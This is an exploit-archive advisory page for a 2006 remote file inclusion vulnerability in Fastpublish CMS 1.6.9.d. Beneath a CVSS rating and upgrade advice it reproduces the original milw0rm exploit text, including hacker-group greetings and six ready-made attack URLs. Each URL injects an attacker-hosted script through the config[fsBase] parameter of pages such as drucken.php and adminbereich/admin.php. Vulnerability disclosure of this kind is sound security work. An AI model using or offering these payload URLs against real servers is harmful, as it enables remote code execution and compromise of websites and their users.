Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities

vendor:

Fastpublish CMS

by:

Kacper (Rahim)

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Fastpublish CMS

Affected Version From: 1.6.9.d

Affected Version To: 1.6.9.d

Patch Exists: Yes

Related CWE: N/A

CPE: a:fastpublish:fastpublish_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Fastpublish CMS v 1.6.9.d – Remote File Include Vulnerabilities

Fastpublish CMS version 1.6.9.d is vulnerable to remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of Fastpublish CMS.

Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities
# Script site: http://www.fastpublish.org
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################

http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]

http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-29]